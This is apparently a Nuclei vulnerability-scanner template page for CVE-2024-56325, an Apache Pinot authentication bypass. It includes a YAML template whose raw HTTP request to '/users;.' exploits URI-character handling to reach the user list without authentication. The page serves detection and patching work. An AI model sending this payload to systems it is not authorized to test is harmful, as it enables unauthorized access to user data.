Apache Pinot < 1.3.0 - Authentication Bypass

ID: CVE-2024-56325

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,apache,pinot,auth-bypass

Description

This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.

YAML Source

id: CVE-2024-56325

info:
  name: Apache Pinot < 1.3.0 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
  remediation: Fixed in version 1.3.0
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-109/
    - https://github.com/advisories/GHSA-6jwp-4wvj-6597
    - https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
    - http://www.openwall.com/lists/oss-security/2025/03/27/8
  classification:
    epss-score: 0.00032
    epss-percentile: 0.05937
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:1696974531
  tags: cve,cve2024,apache,pinot,auth-bypass

http:
  - raw:
      - |
        GET /users HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - raw:
      - |
        GET /users;. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users"'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'Pinot-Controller-'
# digest: 4b0a00483046022100e8c898028ad4178f001a3b17d97df81cdade67abb9a16d211c4f7d6fe436c2a4022100c08d3373f2ae551072bd6f4c8c6b26660e4d7e4a064eb60d72d005c3039d8197:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-56325.yaml"

View on Github